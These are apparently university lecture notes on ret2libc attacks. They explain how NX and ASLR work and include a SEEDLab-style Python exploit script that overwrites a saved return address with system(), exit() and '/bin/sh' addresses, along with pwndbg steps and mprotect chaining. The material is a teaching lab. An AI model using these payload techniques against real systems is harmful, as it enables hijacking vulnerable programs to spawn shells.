Code-Reuse Attacks: ret2libc

The previous module showed how to smash a stack buffer and redirect %eip to injected shellcode. Defenders responded with a hardware-assisted countermeasure: mark the stack segment non-executable (the NX bit on x86-64, or "DEP" — Data Execution Prevention — on Windows). When the CPU tries to fetch an instruction from a page whose execute-permission bit is clear, it raises a fault before a single attacker byte runs.

Game over for shellcode injection. But not for control-flow hijacking. Every process is already loaded with executable code it didn't write: the C standard library, libc. ret2libc exploits this by bending the overflow to return into existing library functions instead of injected bytes. No new code needed.

Why shellcode injection fails under NX

A modern Linux toolchain marks the stack non-executable by default, so the stack is mapped rw-: readable and writable, but not executable. When ret pops an attacker-supplied address that points into the stack, the instruction fetch hits a page without execute permission and the CPU raises a page fault, which the kernel delivers to the process as SIGSEGV. The program crashes, but no shell runs.

Disabling NX for a specific binary (gcc -z execstack) re-enables the old attack. The lecture CTF labs do this intentionally to isolate each concept: shellcode only works with NX off; ret2libc works with NX on (but ASLR off). Understanding what each defense defeats — and what it doesn't — is the point.
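
The permission bits described above can be inspected in a process's memory map on Linux. The following is a minimal sketch that parses one line in the /proc/<pid>/maps format; the helper names and the sample line are illustrative assumptions, not output from the lab machine.

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (start, end, perms, name)."""
    fields = line.split()
    start_s, end_s = fields[0].split("-")
    perms = fields[1]
    # The pathname column is optional; anonymous mappings have none.
    name = fields[5] if len(fields) > 5 else ""
    return int(start_s, 16), int(end_s, 16), perms, name


def is_executable(perms):
    """True when the mapping's permission string has the execute bit set."""
    return "x" in perms


# Hypothetical sample line for a 32-bit process with NX enabled.
sample = "fffdd000-ffffe000 rw-p 00000000 00:00 0          [stack]"
start, end, perms, name = parse_maps_line(sample)
print(name, perms, "executable" if is_executable(perms) else "not executable")
```

On a live Linux system the same parser could be run over each line of /proc/self/maps; a binary built with -z execstack would be expected to show an x in the [stack] entry.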

Existing executable code: libc

Every dynamically linked C program maps libc.so into its address space at load time. Since libc is linked into almost every program, its functions are almost always present and executable. Two are especially useful to attackers:

Function	Signature	Why attackers want it
`system()`	`int system(const char *cmd)`	Runs a shell command; `system("/bin/sh")` spawns a shell
`mprotect()`	`int mprotect(void *addr, size_t len, int prot)`	Changes page permissions — can re-enable stack execution

These functions live in libc's executable text segment. The attacker does not inject them; they are simply already there and mapped into every victim process.

ASLR and why it matters

Address Space Layout Randomization (ASLR) randomizes where the stack, shared libraries, and (optionally) the heap are placed in memory on each run. Linux exposes three levels via kernel.randomize_va_space:

Level	Effect
`0`	No randomization: stack, shared libraries, and heap at the same addresses every run
`1`	Stack and mmap-based regions (including shared libraries such as libc) randomized; heap base fixed
`2`	Everything in level 1, plus the heap (brk) base randomized

Key insight: when ASLR is disabled (randomize_va_space=0), libc loads at the same base address every run. That makes system() and the embedded "/bin/sh" string findable at deterministic, unchanging addresses. The ret2libc lab exercises disable ASLR for exactly this reason. Defeating ASLR with ret2libc requires a separate information-leak step (covered later in the course).
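
A small sketch of the address arithmetic behind this: every libc symbol sits at a fixed offset from the library's load base, so a fixed base means fixed absolute addresses. The base and offsets below are hypothetical values chosen so that the results match the example addresses used in this section; real values depend on the libc build.

```python
# Hypothetical values, chosen only to reproduce this section's example addresses.
LIBC_BASE_NO_ASLR = 0xf7d83000
SYSTEM_OFFSET = 0x44cd0      # assumed offset of system() in this libc build
BINSH_OFFSET = 0x1b60d5      # assumed offset of the "/bin/sh" string


def resolve(libc_base, offset):
    """Absolute 32-bit address of a libc symbol, given the load base."""
    return (libc_base + offset) & 0xffffffff


print(hex(resolve(LIBC_BASE_NO_ASLR, SYSTEM_OFFSET)))
print(hex(resolve(LIBC_BASE_NO_ASLR, BINSH_OFFSET)))

# With ASLR on, only the base changes; the distance between symbols does not.
randomized_base = 0xf7c51000  # hypothetical base from a different run
delta = (resolve(randomized_base, BINSH_OFFSET)
         - resolve(randomized_base, SYSTEM_OFFSET))
print(hex(delta))
```

Because the distance between symbols is constant, learning one libc address at run time is enough to recover the others, which is what an information leak provides.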

The 32-bit calling convention: what system() expects

Before constructing the payload, understand how a normal 32-bit call system("/bin/sh") works. The caller first pushes the argument (the address of "/bin/sh") onto the stack. The call instruction then:

Pushes the next instruction's address (saved return address) onto the stack.
Jumps to system.

At the moment system begins executing, the stack looks like this (high addresses at top):

  high address
  ┌──────────────────────┐
  │  xxxx (caller frame) │   ← above call site
  ├──────────────────────┤  %esp + 4   ← first arg: pointer to "/bin/sh"
  │  addr → "/bin/sh"    │
  ├──────────────────────┤  %esp       ← saved return address (pushed by call)
  │  saved ret addr      │
  └──────────────────────┘
  low address

system reads its argument from %esp + 4. The ret2libc trick is to fake this layout during the overflow so the stack looks exactly as if the program had called system("/bin/sh") legitimately.
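
The layout can be reproduced with a toy model of a descending 32-bit stack. This is only a sketch for illustration, not an emulator; the starting %esp and the return address are arbitrary assumed values.

```python
class Stack32:
    """Toy model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, esp=0xffffd000):  # arbitrary starting %esp
        self.mem = {}
        self.esp = esp

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value & 0xffffffff

    def read(self, addr):
        return self.mem[addr]


def call_system(stack, binsh_addr, return_addr):
    """Mimic the caller's `push arg` followed by `call system`."""
    stack.push(binsh_addr)    # the caller pushes the argument
    stack.push(return_addr)   # call pushes the next instruction's address
    # %eip would now hold system's address; the stack is what system sees.


stack = Stack32()
call_system(stack, binsh_addr=0xf7f390d5, return_addr=0x08049200)
print(hex(stack.read(stack.esp)))      # saved return address at %esp
print(hex(stack.read(stack.esp + 4)))  # first argument at %esp + 4
```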

ret site vs. call site

There is a subtle but important difference:

A call site encodes the target address directly in the call instruction.
A ret site reads the target address from the stack when ret executes.

In a ret2libc attack there is no call instruction — instead ret pops the attacker-supplied system() address into %eip. Because no call was executed, no return address was pushed onto the stack at that moment. This means the attacker must place both the fake return address and the argument manually in the payload, so that %esp lines up correctly when system starts executing.

Constructing the ret2libc payload

The vulnerable function is the familiar vul():

#define SIZE 64
int vul(char *input) {
    char buf[SIZE];
    strcpy(buf, input);   // no bounds check
    return 0;
}

Three sub-tasks are needed:

Task A — Find the address of system(). With ASLR off, pwndbg gives it directly:

pwndbg> p system
$3 = {<text variable, no debug info>} 0xf7dc7cd0 <system>

Task B — Find the address of the "/bin/sh" string. The string is embedded somewhere in libc (used internally by system). Search for it in pwndbg:

pwndbg> search "/bin/sh"
Searching for value: '/bin/sh'
libc.so.6    0xf7f390d5 '/bin/sh'

Task C — Lay out the overflow payload.

The payload must be written into buf from lower to higher address:

[ N bytes padding      ]  ← fill to the saved return address (find N with cyclic)
[ addr of system()     ]  ← 4 bytes, little-endian  — ret pops this into %eip
[ fake return addr     ]  ← 4 bytes — where system() "returns" (use exit() for a clean exit)
[ addr of "/bin/sh"    ]  ← 4 bytes — system()'s first argument
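
To make the "find N" step concrete, here is a simplified stand-in for a cyclic pattern tool. It is not the algorithm pwntools' cyclic uses; it builds an Aa0Aa1Aa2... style pattern in which every 4-byte window is unique, then looks up the bytes that landed in %eip. The crash value is simulated rather than taken from a real run.

```python
import string


def make_pattern(length):
    """Build a non-repeating pattern like Aa0Aa1Aa2... (simplified stand-in)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("pattern length too large for this simple generator")


def find_offset(pattern, crashed_eip):
    """Locate the 4 pattern bytes that ended up in %eip (stored little-endian)."""
    needle = crashed_eip.to_bytes(4, byteorder="little")
    return pattern.find(needle)


pattern = make_pattern(300)
# Pretend the debugger reported this %eip after the crash (hypothetical).
crashed_eip = int.from_bytes(pattern[76:80], byteorder="little")
print(find_offset(pattern, crashed_eip))
```

In a real session the pattern would be fed to the vulnerable program and crashed_eip read from the debugger after the segfault; the returned offset is the N in the layout above.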

Stack state just before ret executes in vul():

  high address
  ┌─────────────────────┐
  │  addr → "/bin/sh"   │   ← system()'s arg  (esp+4 when system starts)
  ├─────────────────────┤
  │  fake_ret (exit())  │   ← system()'s saved ret  (esp when system starts)
  ├─────────────────────┤
  │  addr of system()   │   ← vul()'s saved eip — ret pops this into %eip
  ├─────────────────────┤
  │  N bytes 'A'        │   ← padding over buf + saved ebp
  └─────────────────────┘
  low address

When vul() executes ret:

It pops addr_of_system into %eip — execution jumps to system.
system sees its saved return address at %esp and its first argument at %esp+4.
system("/bin/sh") spawns a shell.
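
These steps can be checked with a tiny simulation of what ret does to the three payload words. It is a sketch that models the stack as a list of 4-byte slots, using the example addresses from this section.

```python
def simulate_ret(stack_words, esp_index):
    """Pop one word into %eip, as ret does; return (eip, new esp index)."""
    eip = stack_words[esp_index]
    return eip, esp_index + 1   # each list slot stands for 4 bytes


# Slots from vul()'s saved-eip slot upward (low address to high address).
system_addr, exit_addr, binsh_addr = 0xf7dc7cd0, 0xf7db4f80, 0xf7f390d5
stack_words = [system_addr, exit_addr, binsh_addr]

eip, esp = simulate_ret(stack_words, 0)
saved_ret_seen_by_system = stack_words[esp]       # the word at %esp
first_arg_seen_by_system = stack_words[esp + 1]   # the word at %esp + 4

print(hex(eip))
print(hex(saved_ret_seen_by_system))
print(hex(first_arg_seen_by_system))
```

After the pop, %eip holds system's address and the two remaining words sit exactly where a legitimately called system would expect its return address and first argument.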

A Python exploit script (modeled on the SEEDLab payload template from the lecture):

#!/usr/bin/env python3
import sys

content = bytearray(0xaa for i in range(300))  # fill with non-zero values

# Addresses found via GDB/pwndbg with ASLR disabled
system_addr = 0xf7dc7cd0   # Task A: p system
sh_addr     = 0xf7f390d5   # Task B: search "/bin/sh"
exit_addr   = 0xf7db4f80   # optional: p exit

# Task C: place addresses at the right offsets
# X     = offset to saved eip (found with cyclic)
# X + 4 = fake return address for system
# X + 8 = system's first argument
X = 76   # example offset; find yours with cyclic
content[X:X+4]    = system_addr.to_bytes(4, byteorder='little')
content[X+4:X+8]  = exit_addr.to_bytes(4, byteorder='little')
content[X+8:X+12] = sh_addr.to_bytes(4, byteorder='little')

sys.stdout.buffer.write(content)
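
Because strcpy stops copying at the first zero byte, any address whose little-endian encoding contains 0x00 would cut the payload short. The sketch below is an optional sanity check on the addresses before building the payload; the helper name is an assumption, not part of the lab template.

```python
def has_bad_bytes(value, bad=b"\x00"):
    """True if the 4-byte little-endian encoding contains a forbidden byte."""
    packed = value.to_bytes(4, byteorder="little")
    return any(byte in bad for byte in packed)


addresses = {
    "system": 0xf7dc7cd0,
    "exit": 0xf7db4f80,
    "/bin/sh": 0xf7f390d5,
}

for name, addr in addresses.items():
    status = "contains a NUL byte" if has_bad_bytes(addr) else "ok"
    print(f"{name}: {addr:#010x} {status}")
```

If an address does contain a zero byte, a common workaround is to pick a different usable address, for example another function or another copy of the string.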

Chaining calls: mprotect() to re-enable the stack

Sometimes the goal is not just a shell but re-enabling stack execution so that injected shellcode can run — useful when system() is unavailable or restricted. The technique chains two libc calls:

Overflow → return into mprotect(stack_page, length, PROT_READ|PROT_WRITE|PROT_EXEC).
mprotect re-marks the stack page executable and returns.
Return address for mprotect points to the shellcode already sitting in the buffer.

The stack layout for a call with multiple arguments is the same idea extended:

  high address
  ┌──────────────────┐
  │  prot (7 = rwx)  │   ← mprotect arg 3
  ├──────────────────┤
  │  len             │   ← mprotect arg 2
  ├──────────────────┤
  │  addr to page    │   ← mprotect arg 1
  ├──────────────────┤
  │  saved ret       │   ← where mprotect returns (shellcode addr)
  ├──────────────────┤
  │  &mprotect()     │   ← vul()'s overwritten saved eip
  └──────────────────┘
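
A minimal sketch of how these five words could be assembled, assuming 4 KiB pages and the Linux values of the PROT_* constants. Both addresses are hypothetical. mprotect requires a page-aligned addr, so the shellcode address is rounded down to its page boundary.

```python
import struct

PAGE_SIZE = 0x1000          # assuming 4 KiB pages
PROT_RWX = 0x1 | 0x2 | 0x4  # PROT_READ | PROT_WRITE | PROT_EXEC on Linux


def page_align(addr, page_size=PAGE_SIZE):
    """Round an address down to the start of its page."""
    return addr & ~(page_size - 1)


def mprotect_frame(mprotect_addr, shellcode_addr, length=PAGE_SIZE):
    """Pack the words from the saved-eip slot upward (low to high address)."""
    words = [
        mprotect_addr,               # overwrites vul()'s saved eip
        shellcode_addr,              # where mprotect "returns"
        page_align(shellcode_addr),  # arg 1: page containing the shellcode
        length,                      # arg 2: number of bytes to re-protect
        PROT_RWX,                    # arg 3: rwx
    ]
    return struct.pack("<5I", *words)


# Hypothetical addresses for illustration only.
frame = mprotect_frame(mprotect_addr=0xf7e9a1e0, shellcode_addr=0xffffd2ac)
print(frame.hex())
```

Note that small values such as len and prot contain zero bytes once packed to 4 bytes, so a strcpy-based overflow could not deliver this frame as-is; the sketch only illustrates the layout.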

Chaining two full functions like this is awkward: when the first function returns, its arguments still occupy the stack slots where the second function expects its own return address and arguments, so something has to "clean up" (skip over) those arguments before the next function sees a correct stack. This difficulty motivates Return-Oriented Programming (ROP), which chains short instruction sequences ending in ret (gadgets) instead of whole functions, giving Turing-complete control without injecting any executable code.

PLT/GOT: calling libc through the binary

When GCC compiles a call to system() in a dynamically linked program, it generates call system@plt. The Procedure Linkage Table (PLT) is a trampoline stub in the binary's own text; it jumps through the address stored in the function's Global Offset Table (GOT) entry. The dynamic linker fills in that entry with the real libc address, either at load time (eager binding) or on the first call (lazy binding).

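For ret2libc with ASLR off, attackers use the raw libc address (from p system in GDB), which bypasses the PLT entirely. The PLT matters once libc's base is randomized: if the binary itself imports system(), the system@plt stub lives in the binary's own text, so in a non-PIE executable its address stays fixed even when libc's base changes. In a position-independent executable (compiled with -fPIE and linked with -pie) the stub moves with the binary's randomized base, so only its offset within the binary is stable.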
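
The indirection can be pictured with a toy model, which is not real ELF parsing. It assumes a non-PIE executable, so the stub address is a constant, while the GOT slot holds whatever address the dynamic linker resolved for this run. All addresses and offsets are hypothetical.

```python
class ToyImage:
    """Toy model of one binary's PLT stub and GOT slot for system()."""

    PLT_SYSTEM = 0x08049040   # hypothetical fixed stub address (non-PIE)

    def __init__(self, libc_base, system_offset):
        # The dynamic linker writes the resolved address into the GOT slot.
        self.got = {"system": libc_base + system_offset}

    def plt_jump(self, name):
        """What the stub does: an indirect jump through the GOT slot."""
        return self.got[name]


# Two runs with different (hypothetical) libc bases.
run1 = ToyImage(libc_base=0xf7d83000, system_offset=0x44cd0)
run2 = ToyImage(libc_base=0xf7c51000, system_offset=0x44cd0)

print(hex(run1.PLT_SYSTEM), "->", hex(run1.plt_jump("system")))
print(hex(run2.PLT_SYSTEM), "->", hex(run2.plt_jump("system")))
```

The stub address is the same in both runs while the destination differs, which is why returning into the stub does not require knowing libc's base.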

Key takeaways

NX/DEP prevents executing injected bytes on the stack; it does not prevent hijacking the return address to point elsewhere.
ret2libc sidesteps NX by redirecting control into already-executable library code; no injection is needed.
The 32-bit cdecl convention passes arguments on the stack; the payload must place [system_addr][fake_ret][&"/bin/sh"] starting exactly at the overwritten return slot, with system_addr in the slot itself.
The ret site differs from a call site: no return address is pushed by a call, so the attacker must supply it manually in the payload.
ASLR makes finding libc addresses harder by randomizing the load base; disabling it (randomize_va_space=0) makes the lab tractable.
mprotect() can be used as a first hop to re-enable stack execution before jumping to shellcode — a direct precursor to ROP chains.
The next module (ROP) generalizes this idea: instead of whole functions, attackers chain tiny instruction sequences ("gadgets") ending in ret, enabling Turing-complete computation from existing code alone.